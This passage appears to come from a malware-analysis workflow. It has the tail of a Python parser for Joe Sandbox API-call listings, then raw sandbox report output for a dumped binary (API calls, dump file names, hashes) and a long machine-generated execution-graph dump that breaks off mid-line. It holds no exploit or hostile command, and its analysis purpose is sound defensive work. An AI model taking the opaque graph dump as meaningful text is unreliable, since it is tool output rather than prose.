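    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[A-Za-z_][\w@?$]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
DUMP_RE = re.compile(
    r"Source File:\s*(?P<file>\S+\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)"
)
# COM failure codes that appear as EntryPoint arguments in the report (example's own table).
HRESULT_NAMES = {0x80070057: "E_INVALIDARG", 0x8007000E: "E_OUTOFMEMORY"}


@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: Tuple[str, ...]
    ref: int                   # address of the call site inside the dumped image
    subcall_of: Optional[int]  # callee address when the line is a "Part of subcall" entry


def parse_api_calls(text: str) -> List[ApiCall]:
    """Return every call-site line of the listing, in order; other lines are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = API_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = tuple(a.strip() for a in raw.split(",")) if raw else ()
        sub = m.group("sub")
        calls.append(ApiCall(m.group("name"), m.group("module"), args,
                             int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


def external_imports(calls: List[ApiCall], own_module: str,
                     crt_modules: Tuple[str, ...] = ("LIBCMT",)) -> Dict[str, List[str]]:
    """Group API names by module, dropping the image's own symbols and the static CRT.

    The result is the hunt list: what the function actually asks the OS to do.
    """
    grouped: Dict[str, set] = {}
    for c in calls:
        if c.module == own_module or c.module in crt_modules:
            continue
        grouped.setdefault(c.module, set()).add(c.name)
    return {mod: sorted(names) for mod, names in sorted(grouped.items())}


def hresult_failures(calls: List[ApiCall]) -> List[Tuple[int, int, str]]:
    """Heuristic: an 8-hex-digit argument with the failure bit set (0x8xxxxxxx) is
    reported as an HRESULT together with the call site that passes it."""
    found = []
    for c in calls:
        for a in c.args:
            if re.fullmatch(r"[0-9A-Fa-f]{8}", a) and int(a, 16) >= 0x80000000:
                code = int(a, 16)
                found.append((c.ref, code, HRESULT_NAMES.get(code, "unknown")))
    return sorted(found)


def parse_dump_source(text: str) -> Optional[Tuple[str, int, bool]]:
    """Return (dump file name, load offset, based-on-PE flag) from a 'Source File:' line."""
    m = DUMP_RE.search(text)
    if not m:
        return None
    return m.group("file"), int(m.group("offset"), 16), m.group("pe") == "true"


if __name__ == "__main__":
    calls = parse_api_calls(SAMPLE)
    for c in calls:
        nest = f" (via {c.subcall_of:08X})" if c.subcall_of is not None else ""
        print(f"{c.ref:08X}  {c.module}!{c.name}{c.args}{nest}")
    print("imports:", external_imports(calls, own_module="BWSIUVCU"))
    print("hresults:", [(f"{r:08X}", f"{k:08X}", n) for r, k, n in hresult_failures(calls)])
    print("dump:", parse_dump_source(SAMPLE))
```

Run the file directly to print the records for the constructed sample; to apply it to a real report, paste a function's APIs block into SAMPLE or read it from a file. The HRESULT check is only a heuristic: any 8-digit argument at or above 80000000 is reported, so a pointer in that range in a 32-bit image would be flagged too, and the subcall lines are kept because an API reached through a callee (RtlAllocateHeap under _malloc here) still belongs to the function's observable behaviour.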

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000017.00000001.1494452738.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                            • Associated: 00000017.00000001.1494452738.000000000044B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_1_400000_bwsiuvcU.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                            • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                            • API String ID: 1646373207-3105848591
                                                                                                                            • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                            • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                                                                            • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                                                                            • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • __fileno.LIBCMT ref: 0040C77C
                                                                                                                            • __locking.LIBCMT ref: 0040C791
                                                                                                                              • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                              • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000017.00000001.1494452738.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000017.00000001.1494452738.000000000044B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_1_400000_bwsiuvcU.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2395185920-0
                                                                                                                            • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                            • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                                                                                            • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                                                                            • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000017.00000001.1494452738.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000017.00000001.1494452738.000000000044B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_1_400000_bwsiuvcU.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _fseek_malloc_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 208892515-0
                                                                                                                            • Opcode ID: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                            • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                                                                                            • Opcode Fuzzy Hash: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                            • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • __flush.LIBCMT ref: 0040BB6E
                                                                                                                            • __fileno.LIBCMT ref: 0040BB8E
                                                                                                                            • __locking.LIBCMT ref: 0040BB95
                                                                                                                            • __flsbuf.LIBCMT ref: 0040BBC0
                                                                                                                              • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                              • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000017.00000001.1494452738.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000017.00000001.1494452738.000000000044B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_1_400000_bwsiuvcU.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3240763771-0
                                                                                                                            • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                            • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                                                                                            • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                                                                            • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                                                                            • __isleadbyte_l.LIBCMT ref: 00415307
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000017.00000001.1494452738.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000017.00000001.1494452738.000000000044B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_1_400000_bwsiuvcU.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3058430110-0
                                                                                                                            • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                            • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
                                                                                                                            • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
                                                                                                                            • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000017.00000001.1494452738.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 00000017.00000001.1494452738.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                             • Associated: 00000017.00000001.1494452738.000000000044B000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_23_1_400000_bwsiuvcU.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3016257755-0
                                                                                                                            • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                            • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                                                                            • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                            • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:8.6%
                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:1921
                                                                                                                            Total number of Limit Nodes:9
calls 26052->26053 26055 28bf470 26053->26055 26056 28c07f5 26054->26056 26057 28a44f4 8 API calls 26055->26057 26060 28b7be8 14 API calls 26056->26060 26059 28bf47f 26057->26059 26061 28b7be8 14 API calls 26058->26061 26062 28a4824 8 API calls 26059->26062 26063 28c0801 26060->26063 26064 28becc6 26061->26064 26065 28bf4a0 26062->26065 26066 28a4824 8 API calls 26063->26066 26067 28a4824 8 API calls 26064->26067 26068 28bf4ab 26065->26068 26069 28c0822 26066->26069 26070 28bece7 26067->26070 26073 28bf4b8 26068->26073 26072 28c083a 26069->26072 26071 28becf2 26070->26071 26079 28becff 26071->26079 26074 28c0859 26072->26074 26076 28a4698 26073->26076 26075 28c0864 26074->26075 26081 28b7be8 14 API calls 26075->26081 26077 28bf4ef 26076->26077 26078 28b7be8 14 API calls 26077->26078 26080 28bf4fb 26078->26080 26082 28b7be8 14 API calls 26079->26082 26083 28a4824 8 API calls 26080->26083 26084 28c087d 26081->26084 26085 28bed42 26082->26085 26092 28bf51c 26083->26092 26086 28a4824 8 API calls 26084->26086 26087 28a4824 8 API calls 26085->26087 26090 28c089e 26086->26090 26088 28bed63 26087->26088 26089 28bed6e 26088->26089 26094 28bed7b 26089->26094 26091 28c08b6 26090->26091 26093 28c08d5 26091->26093 26097 28a4698 26092->26097 26096 28c08e0 26093->26096 26095 28beda5 26094->26095 26098 28bedb2 26095->26098 26100 28c08ed 26096->26100 26099 28bf56b 26097->26099 26104 28b7be8 14 API calls 26098->26104 26101 28b7be8 14 API calls 26099->26101 26103 28b7be8 14 API calls 26100->26103 26102 28bf577 26101->26102 26105 28bc5c8 32 API calls 26102->26105 26106 28c08f9 26103->26106 26107 28bedbe 26104->26107 26108 28bf581 26105->26108 26109 28a4824 8 API calls 26106->26109 26110 28a4824 8 API calls 26107->26110 26108->26040 26111 28bf589 26108->26111 26112 28c091a 26109->26112 26113 28beddf 26110->26113 26114 28a4824 8 API calls 26111->26114 26117 28c0925 26112->26117 26115 28a4964 26113->26115 26116 28bf5aa 26114->26116 26118 28bedea 26115->26118 26120 28bf5b5 26116->26120 
26121 28c0932 26117->26121 26119 28a4698 26118->26119 26122 28bedf7 26119->26122 26123 28a4698 26120->26123 26127 28c0951 26121->26127 26124 28bee21 26122->26124 26126 28bf5c2 26123->26126 26125 28bee2e 26124->26125 26130 28b7be8 14 API calls 26125->26130 26131 28bf5f9 26126->26131 26128 28c0969 26127->26128 26129 28b7be8 14 API calls 26128->26129 26132 28c0975 26129->26132 26133 28bee3a 26130->26133 26134 28b7be8 14 API calls 26131->26134 26137 28c8b9b 26132->26137 26140 28a4824 8 API calls 26132->26140 26135 28a4824 8 API calls 26133->26135 26136 28bf605 26134->26136 26138 28bee5b 26135->26138 26139 28a4824 8 API calls 26136->26139 26141 28bee66 26138->26141 26142 28bf626 26139->26142 26143 28c09bb 26140->26143 26145 28bee73 26141->26145 26144 28bf631 26142->26144 26151 28c09c6 26143->26151 26146 28a4698 26144->26146 26148 28bee9d 26145->26148 26147 28bf63e 26146->26147 26149 28bf668 26147->26149 26150 28beeaa 26148->26150 26153 28a4698 26149->26153 26152 28b7be8 14 API calls 26150->26152 26156 28b7be8 14 API calls 26151->26156 26154 28beeb6 26152->26154 26155 28bf675 26153->26155 26162 28a4d38 26154->26162 26157 28b7be8 14 API calls 26155->26157 26158 28c0a16 26156->26158 26159 28bf681 26157->26159 26161 28a4824 8 API calls 26158->26161 26160 28a7a88 32 API calls 26159->26160 26163 28bf68b 26160->26163 26170 28c0a37 26161->26170 26164 28beecd 26162->26164 26165 28bd270 8 API calls 26163->26165 26166 28bc4dc 11 API calls 26164->26166 26167 28bf69d 26165->26167 26168 28beede 26166->26168 26169 28a44f4 8 API calls 26167->26169 26171 28a44f4 8 API calls 26168->26171 26172 28bf6ad 26169->26172 26179 28c0a6e 26170->26179 26173 28beeee 26171->26173 26174 28a4824 8 API calls 26172->26174 26175 28a4824 8 API calls 26173->26175 26176 28bf6ce 26174->26176 26182 28bef4b 26175->26182 26177 28bf6d9 26176->26177 26178 28a4698 26177->26178 26185 28bf6e6 26178->26185 26180 28b7be8 14 API calls 26179->26180 26181 28c0a92 26180->26181 26183 28a4824 8 API calls 26181->26183 26184 
28a4964 26182->26184 26189 28c0ab3 26183->26189 26186 28bef8d 26184->26186 26187 28bf71d 26185->26187 26190 28b7be8 14 API calls 26186->26190 26188 28b7be8 14 API calls 26187->26188 26191 28bf729 26188->26191 26195 28c0acb 26189->26195 26190->26040 26192 28a4824 8 API calls 26191->26192 26193 28bf74a 26192->26193 26194 28a4964 26193->26194 26196 28bf755 26194->26196 26197 28c0b02 26195->26197 26199 28bf762 26196->26199 26198 28b7be8 14 API calls 26197->26198 26200 28c0b0e 26198->26200 26202 28bf78c 26199->26202 26201 28a4824 8 API calls 26200->26201 26203 28c0b2f 26201->26203 26205 28bf799 26202->26205 26204 28c0b3a 26203->26204 26214 28c0b47 26204->26214 26206 28b7be8 14 API calls 26205->26206 26207 28bf7a5 26206->26207 26208 28a4824 8 API calls 26207->26208 26209 28bf7c6 26208->26209 26210 28a4964 26209->26210 26211 28bf7d1 26210->26211 26212 28a4698 26211->26212 26213 28bf7de 26212->26213 26221 28bf808 26213->26221 26215 28b7be8 14 API calls 26214->26215 26216 28c0b8a 26215->26216 26217 28a7a88 32 API calls 26216->26217 26218 28c0b94 26217->26218 26219 28bd270 8 API calls 26218->26219 26220 28c0ba6 26219->26220 26222 28a44f4 8 API calls 26220->26222 26223 28b7be8 14 API calls 26221->26223 26224 28c0bb6 26222->26224 26225 28bf821 26223->26225 26227 28a4824 8 API calls 26224->26227 26226 28a4824 8 API calls 26225->26226 26228 28bf842 26226->26228 26234 28c0bd7 26227->26234 26229 28a4964 26228->26229 26230 28bf84d 26229->26230 26231 28bf879 26230->26231 26232 28bf884 26231->26232 26233 28a4698 26232->26233 26235 28bf891 26233->26235 26236 28c0c26 26234->26236 26238 28b7be8 14 API calls 26235->26238 26237 28b7be8 14 API calls 26236->26237 26239 28c0c32 26237->26239 26240 28bf89d 26238->26240 26241 28a4824 8 API calls 26239->26241 26242 28a4824 8 API calls 26240->26242 26249 28c0c53 26241->26249 26243 28bf8be 26242->26243 26244 28a4964 26243->26244 26245 28bf8c9 26244->26245 26246 28bf8f5 26245->26246 26247 28bf900 26246->26247 26248 28a4698 26247->26248 26250 
28bf90d 26248->26250 26251 28c0ca2 26249->26251 26252 28b7be8 14 API calls 26250->26252 26253 28b7be8 14 API calls 26251->26253 26254 28bf919 26252->26254 26255 28c0cae 26253->26255 26257 28bc640 10 API calls 26254->26257 26256 28bd20c 8 API calls 26255->26256 26258 28c0cbe 26256->26258 26259 28bf92e 26257->26259 26260 28a44f4 8 API calls 26258->26260 26261 28a57dc 10 API calls 26259->26261 26262 28c0cce 26260->26262 26263 28bf944 26261->26263 26265 28a4824 8 API calls 26262->26265 26264 28a4824 8 API calls 26263->26264 26266 28bf965 26264->26266 26268 28c0cef 26265->26268 26267 28bf970 26266->26267 26269 28bf99c 26267->26269 26270 28c0d26 26268->26270 26271 28bf9a7 26269->26271 26272 28c0d31 26270->26272 26273 28a4698 26271->26273 26275 28b7be8 14 API calls 26272->26275 26274 28bf9b4 26273->26274 26276 28b7be8 14 API calls 26274->26276 26277 28c0d4a 26275->26277 26278 28bf9c0 26276->26278 26279 28a4824 8 API calls 26277->26279 26280 28a4824 8 API calls 26278->26280 26283 28c0d6b 26279->26283 26281 28bf9e1 26280->26281 26282 28bf9ec 26281->26282 26285 28bfa18 26282->26285 26284 28c0da2 26283->26284 26286 28c0dad 26284->26286 26287 28a4698 26285->26287 26289 28c0dba 26286->26289 26288 28bfa30 26287->26288 26290 28b7be8 14 API calls 26288->26290 26291 28b7be8 14 API calls 26289->26291 26292 28bfa3c 26290->26292 26293 28c0dc6 26291->26293 26295 28a4824 8 API calls 26292->26295 26294 28a4824 8 API calls 26293->26294 26296 28c0de7 26294->26296 26297 28bfa5d 26295->26297 26298 28c0df2 26296->26298 26301 28bfa68 26297->26301 26299 28c0dff 26298->26299 26300 28c0e1e 26299->26300 26302 28c0e29 26300->26302 26303 28a4698 26301->26303 26305 28c0e36 26302->26305 26304 28bfaac 26303->26304 26306 28b7be8 14 API calls 26304->26306 26307 28b7be8 14 API calls 26305->26307 26308 28bfab8 26306->26308 26309 28c0e42 26307->26309 26310 28a4824 8 API calls 26308->26310 26311 28c0e53 26309->26311 26316 28bfae3 26310->26316 26312 28bc640 10 API calls 26311->26312 26313 28c0e69 26312->26313 
26314 28a57dc 10 API calls 26313->26314 26315 28c0e7c 26314->26315 26318 28a4824 8 API calls 26315->26318 26317 28bfafb 26316->26317 26320 28bfb1a 26317->26320 26319 28c0e9d 26318->26319 26321 28c0ea8 26319->26321 26322 28bfb25 26320->26322 26330 28c0eb5 26321->26330 26323 28a4698 26322->26323 26324 28bfb32 26323->26324 26325 28b7be8 14 API calls 26324->26325 26326 28bfb3e 26325->26326 26327 28a4824 8 API calls 26326->26327 26328 28bfb5f 26327->26328 26329 28bfb6a 26328->26329 26334 28bfb77 26329->26334 26331 28b7be8 14 API calls 26330->26331 26332 28c0ef8 26331->26332 26333 28a4824 8 API calls 26332->26333 26335 28c0f19 26333->26335 26336 28bfb96 26334->26336 26337 28c0f24 26335->26337 26338 28bfba1 26336->26338 26343 28c0f31 26337->26343 26339 28b7be8 14 API calls 26338->26339 26340 28bfbba 26339->26340 26341 28a44f4 8 API calls 26340->26341 26342 28a4824 8 API calls 26340->26342 26341->26340 26344 28bfbf4 26342->26344 26345 28b7be8 14 API calls 26343->26345 26348 28bfbff 26344->26348 26346 28c0f74 26345->26346 26347 28a44f4 8 API calls 26346->26347 26349 28c0f83 26347->26349 26353 28bfc0c 26348->26353 26350 28a44f4 8 API calls 26349->26350 26351 28c0f92 26350->26351 26352 28a44f4 8 API calls 26351->26352 26354 28c0fa1 26352->26354 26357 28bfc43 26353->26357 26355 28a44f4 8 API calls 26354->26355 26356 28c0fb0 26355->26356 26358 28a44f4 8 API calls 26356->26358 26359 28b7be8 14 API calls 26357->26359 26360 28c0fbf 26358->26360 26361 28bfc4f 26359->26361 26362 28a44f4 8 API calls 26360->26362 26363 28a4824 8 API calls 26361->26363 26364 28c0fce 26362->26364 26374 28bfc70 26363->26374 26365 28a44f4 8 API calls 26364->26365 26366 28c0fdd 26365->26366 26367 28a44f4 8 API calls 26366->26367 26368 28c0fec 26367->26368 26369 28a44f4 8 API calls 26368->26369 26370 28c0ffb 26369->26370 26371 28a44f4 8 API calls 26370->26371 26372 28c100a 26371->26372 26373 28a44f4 8 API calls 26372->26373 26375 28c1019 26373->26375 26376 28bfcbf 26374->26376 26377 28a4824 8 API calls 
26375->26377 26378 28b7be8 14 API calls 26376->26378 26381 28c103a 26377->26381 26379 28bfccb 26378->26379 26380 28bc8ac 15 API calls 26379->26380 26382 28bfcdd 26379->26382 26383 28c0772 26379->26383 26411 28bfdec 26379->26411 26664 28b7be8 14 API calls 26379->26664 26666 28c0562 26379->26666 26380->26379 26387 28c1071 26381->26387 26384 28a4824 8 API calls 26382->26384 26383->26040 26383->26308 26385 28bfcfe 26384->26385 26386 28bfd09 26385->26386 26390 28bfd16 26386->26390 26388 28b7be8 14 API calls 26387->26388 26389 28c1095 26388->26389 26391 28a4824 8 API calls 26389->26391 26392 28bfd4d 26390->26392 26394 28c10b6 26391->26394 26393 28b7be8 14 API calls 26392->26393 26399 28bfd59 26393->26399 26396 28c10ce 26394->26396 26395 28a4824 8 API calls 26395->26399 26397 28c1105 26396->26397 26398 28b7be8 14 API calls 26397->26398 26400 28c1111 26398->26400 26399->26379 26399->26395 26401 28c1128 26400->26401 26402 28a7e3c GetFileAttributesA 26401->26402 26403 28c1133 26402->26403 26404 28c113b 26403->26404 26470 28c1319 26403->26470 26406 28a4824 8 API calls 26404->26406 26405 28a4824 8 API calls 26407 28c1345 26405->26407 26408 28c115c 26406->26408 26409 28c1350 26407->26409 26412 28c1174 26408->26412 26415 28c135d 26409->26415 26410 28a4824 8 API calls 26410->26411 26411->26410 26413 28bfe25 26411->26413 26414 28c1193 26412->26414 26416 28bfe44 26413->26416 26417 28b7be8 14 API calls 26414->26417 26418 28b7be8 14 API calls 26415->26418 26422 28b7be8 14 API calls 26416->26422 26420 28c11b7 26417->26420 26419 28c13a0 26418->26419 26421 28a4824 8 API calls 26419->26421 26423 28a4824 8 API calls 26420->26423 26424 28c13c1 26421->26424 26425 28bfe68 26422->26425 26426 28c11d8 26423->26426 26427 28c13cc 26424->26427 26428 28a4824 8 API calls 26425->26428 26431 28c11f0 26426->26431 26433 28c13d9 26427->26433 26429 28bfe89 26428->26429 26430 28bfea1 26429->26430 26434 28bfec0 26430->26434 26432 28c1227 26431->26432 26435 28b7be8 14 API calls 26432->26435 26436 28b7be8 14 
API calls 26433->26436 26437 28bfed8 26434->26437 26438 28c1233 26435->26438 26439 28c141c 26436->26439 26440 28b7be8 14 API calls 26437->26440 26446 28c1262 26438->26446 26441 28a49c4 8 API calls 26439->26441 26445 28bfee4 26440->26445 26442 28c144f 26441->26442 26443 28a4824 8 API calls 26442->26443 26454 28c1470 26443->26454 26444 28a4824 8 API calls 26444->26445 26445->26444 26447 28bff17 26445->26447 26448 28b7be8 14 API calls 26446->26448 26452 28bff24 26447->26452 26449 28c1286 26448->26449 26450 28a4824 8 API calls 26449->26450 26451 28c12a7 26450->26451 26459 28c12bf 26451->26459 26453 28bff4e 26452->26453 26461 28bff5b 26453->26461 26455 28b7be8 14 API calls 26454->26455 26456 28c14cb 26455->26456 26458 28a4824 8 API calls 26456->26458 26457 28b7be8 14 API calls 26457->26461 26463 28c14ec 26458->26463 26462 28c12f6 26459->26462 26460 28a4824 8 API calls 26460->26461 26461->26457 26461->26460 26464 28bff93 26461->26464 26465 28b7be8 14 API calls 26462->26465 26467 28c1504 26463->26467 26468 28bffa0 26464->26468 26466 28c1302 26465->26466 26466->26470 26471 28c153b 26467->26471 26469 28a4964 26468->26469 26475 28bffca 26469->26475 26470->26405 26472 28b7be8 14 API calls 26471->26472 26473 28c1547 26472->26473 26476 28a4824 8 API calls 26473->26476 26474 28b7be8 14 API calls 26474->26475 26475->26474 26478 28b6d84 33 API calls 26475->26478 26477 28c1568 26476->26477 26483 28c1573 26477->26483 26479 28bfff3 26478->26479 26480 28b2854 40 API calls 26479->26480 26481 28c0003 26480->26481 26482 28a4824 8 API calls 26481->26482 26484 28c002f 26481->26484 26482->26481 26485 28c15aa 26483->26485 26486 28a4698 26484->26486 26488 28b7be8 14 API calls 26485->26488 26487 28c003c 26486->26487 26491 28c005b 26487->26491 26489 28c15c3 26488->26489 26490 28a4824 8 API calls 26489->26490 26493 28c15e4 26490->26493 26494 28c0073 26491->26494 26492 28b7be8 14 API calls 26492->26494 26498 28c161b 26493->26498 26494->26492 26495 28a4824 8 API calls 26494->26495 26496 28c00a0 
26495->26496 26497 28c00ab 26496->26497 26500 28c00b8 26497->26500 26499 28b7be8 14 API calls 26498->26499 26501 28c163f 26499->26501 26502 28c00e2 26500->26502 26504 28c1654 26501->26504 26659 28c1aa1 26501->26659 26503 28c00ef 26502->26503 26507 28b7be8 14 API calls 26503->26507 26506 28a4824 8 API calls 26504->26506 26505 28a4824 8 API calls 26509 28c3366 26505->26509 26511 28c1692 26506->26511 26508 28c00fb 26507->26508 26510 28ae3b8 48 API calls 26508->26510 26512 28a4824 8 API calls 26508->26512 26515 28c3371 26509->26515 26510->26508 26513 28c16aa 26511->26513 26514 28c013c 26512->26514 26516 28c16bd 26513->26516 26513->26659 26518 28c0147 26514->26518 26520 28c33a8 26515->26520 26517 28a4824 8 API calls 26516->26517 26523 28c16de 26517->26523 26519 28c0173 26518->26519 26524 28c017e 26519->26524 26521 28b7be8 14 API calls 26520->26521 26522 28c33c1 26521->26522 26525 28a4824 8 API calls 26522->26525 26530 28c1715 26523->26530 26527 28c018b 26524->26527 26529 28c33e2 26525->26529 26526 28b7be8 14 API calls 26526->26527 26527->26526 26528 28a4824 8 API calls 26527->26528 26533 28c01b8 26528->26533 26536 28c3419 26529->26536 26531 28b7be8 14 API calls 26530->26531 26532 28c1739 26531->26532 26534 28a4824 8 API calls 26532->26534 26535 28c01d0 26533->26535 26540 28c175a 26534->26540 26537 28c01ef 26535->26537 26538 28b7be8 14 API calls 26536->26538 26542 28c0207 26537->26542 26539 28c343d 26538->26539 26541 28a4824 8 API calls 26539->26541 26545 28c1772 26540->26545 26543 28c345e 26541->26543 26544 28b7be8 14 API calls 26542->26544 26551 28c3476 26543->26551 26546 28c0213 26544->26546 26548 28c17a9 26545->26548 26547 28ae3b8 48 API calls 26546->26547 26553 28c0224 26547->26553 26550 28b7be8 14 API calls 26548->26550 26549 28a4824 8 API calls 26549->26553 26552 28c17b5 26550->26552 26557 28c34ad 26551->26557 26554 28a4824 8 API calls 26552->26554 26553->26549 26555 28c0253 26553->26555 26556 28c17d6 